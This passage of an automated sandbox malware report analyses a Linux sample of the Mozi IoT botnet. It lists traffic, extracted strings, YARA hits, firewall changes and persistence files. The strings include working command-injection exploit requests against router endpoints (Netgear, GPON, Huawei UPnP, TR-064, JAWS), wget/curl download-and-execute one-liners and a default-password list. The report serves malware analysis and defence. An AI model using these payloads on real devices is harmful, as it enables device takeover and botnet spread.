72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 May 2021 18:05:29 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 69 6e 75 73 76 2e 66 76 64 73 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at sinusv.fvds.ru Port 80</address></body></html>
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m;
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m;$
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/bin.sh
Source: nT7K5GG5km String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: nT7K5GG5km String found in binary or memory: http://127.0.0.1
Source: nT7K5GG5km String found in binary or memory: http://127.0.0.1sendcmd
Source: nT7K5GG5km String found in binary or memory: http://HTTP/1.1
Source: nT7K5GG5km String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: nT7K5GG5km String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: nT7K5GG5km String found in binary or memory: http://purenetworks.com/HNAP1/
Source: nT7K5GG5km String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: nT7K5GG5km String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: nT7K5GG5km String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/nT7K5GG5km (PID: 4600) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary:

barindex
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: nT7K5GG5km, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4672) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4679) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4720) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4732) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4755) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4763) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4785) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4815) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4819) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4838) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4866) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4896) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4915) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4939) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4986) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5015) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5063) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5071) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5095) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5119) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5139) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5158) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5167) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5194) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5215) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5229) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5253) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/nT7K5GG5km (PID: 4600) File: /proc/4600/mounts Jump to behavior
Sample tries to persist itself using /etc/profile
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/bash_completion.sh Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Sample tries to persist itself using System V runlevels
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/rcS.d/S95baby.sh Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/rc.local Jump to behavior
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4604) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4294/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3512/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/359/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1452/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3632/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4600/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4602/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3518/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1339/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4605/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/19/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/483/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3527/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3527/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1/stat Jump to behavior
